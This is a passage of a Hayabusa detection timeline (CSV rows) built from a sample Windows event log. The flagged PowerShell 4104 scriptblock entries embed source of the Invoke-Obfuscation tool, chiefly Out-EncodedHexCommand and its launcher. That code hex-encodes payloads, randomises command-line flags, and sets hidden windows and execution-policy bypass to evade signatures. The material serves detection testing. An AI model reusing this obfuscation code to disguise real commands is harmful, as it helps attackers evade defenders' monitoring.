$CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. 